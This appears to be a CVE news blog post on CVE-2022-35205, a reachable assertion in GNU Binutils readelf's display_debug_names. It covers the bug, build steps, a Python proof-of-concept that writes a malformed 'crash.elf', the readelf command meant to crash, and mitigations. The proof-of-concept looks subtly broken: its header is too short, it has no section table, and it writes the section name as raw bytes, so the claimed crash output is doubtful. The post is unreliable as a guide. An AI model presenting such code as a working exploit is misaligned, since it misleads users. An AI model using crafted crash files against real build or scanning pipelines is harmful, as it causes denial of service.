CVE CyberSecurity Database News

CVE-2022-35205 - Reachable Assertion Failure in Binutils Readelf 2.38.50 (display_debug_names) – Detailed Analysis, Exploit, and Mitigation

Poster -

---

Introduction

CVE-2022-35205 exposes a vulnerability in GNU Binutils, specifically in the readelf utility version 2.38.50. Binutils is a set of binary tools widely used on Linux and Unix systems for manipulating object files. readelf analyzes binary executables and outputs information, making it a common tool in toolchains and pentesting.

In May 2022, security researchers found an issue in readelf—a reachable assertion failure in the display_debug_names function. This means attackers can craft a malformed file, which, when processed by readelf, will trigger an internal assertion. The crash causes a Denial of Service (DoS), which, in automated or batch-processing environments, can impact workflows and CI/CD pipelines.

This post breaks down the vulnerability, shows proof-of-concept (PoC) code, and explains how to protect your systems.

Vulnerability Details

- Software Affected: GNU Binutils (readelf) version 2.38.50 (and possibly earlier/later)

What is a Reachable Assertion?

Assertions are sanity checks in code. If a program logic never expects some condition to be true, an assertion will halt if it is. Sometimes, when attackers can reach those assertions with crafted input, they can stop your program—Denial of Service.

How Does This Happen in readelf?

A malformed ELF file (Executable and Linkable Format) can have a debug section that makes display_debug_names in readelf hit an assertion. This isn’t code execution or privilege escalation; it’s a crash point.

Demonstration with Proof-of-Concept

You need Binutils 2.38.50 (or a close version). We'll make a malformed ELF file that triggers the assertion.

Install the vulnerable version if available, or build from source

git clone git://sourceware.org/git/binutils-gdb.git
cd binutils-gdb
git checkout binutils-2_38_50
./configure --prefix=/tmp/binutils-2.38.50
make -j4
make install

Step 2: Create Malformed ELF File

You can use hex editors to corrupt sections, but the following Python script creates a simple PoC ELF file with a bogus debug section:

with open("crash.elf", "wb") as f:
    # ELF header (simplified, 64-bit little endian)
    f.write(
        b"\x7fELF"          # Magic
        b"\x02"             # 64-bit
        b"\x01"             # Little endian
        b"\x01"             # ELF version
        b"\x00" * 9         # Unused
        b"\x02\x00"         # Type: EXEC (or ET_DYN)
        b"\x3e\x00"         # x86_64
        b"\x01\x00\x00\x00" # Version
        + b"\x00" * 24      # Rest of header
    )
    # Corrupted debug_names section to trigger assert in display_debug_names
    f.write(b".debug_names" + b"\x00" * 100)

Step 3: Run readelf

/tmp/binutils-2.38.50/bin/readelf --debug-dump=names crash.elf

You should see an error similar to

readelf: dwarf.c:928: display_debug_names: Assertion `unit_offset < end_offset' failed.
Aborted (core dumped)

Depending on your environment, the assertion line might change; the key is it crashes!

Why is This Bad?

This bug is especially dangerous where automated scripts or build processes run readelf on untrusted input, such as:

Any public-facing upload-analyzer sites

Attackers can submit crafted objects that halt your infrastructure or scan processes.

- CVE-2022-35205 on NIST NVD
- GNU Binutils Project Repository
- Original Report in Bugzilla

Mitigation and Recommendations

- Update Binutils: Newer versions have fixed this assertion error. Always use the latest stable version from your distribution.

Automated Sanity Checks: Pre-validate input files before readelf processing.

- Crash Handling: Run readelf under a process that catches failures and gracefully reports them instead of crashing your pipeline.

Checking Version

readelf --version

Upstream patches typically add better checks before assertions, for example

if (unit_offset >= end_offset) {
    error ("Malformed .debug_names section");
    return;
}

Conclusion

CVE-2022-35205 reminds us even simple CLI tools can contain dangerous bugs that attackers can abuse for denial of service. Always validate external input—even when using 'read-only' utilities. Stay patched, stay safe.


Share this post:
*Protect your pipelines. Patch Binutils. #CVE202235205*

Timeline

Published on: 08/22/2023 19:16:23 UTC
Last modified on: 10/06/2023 15:15:13 UTC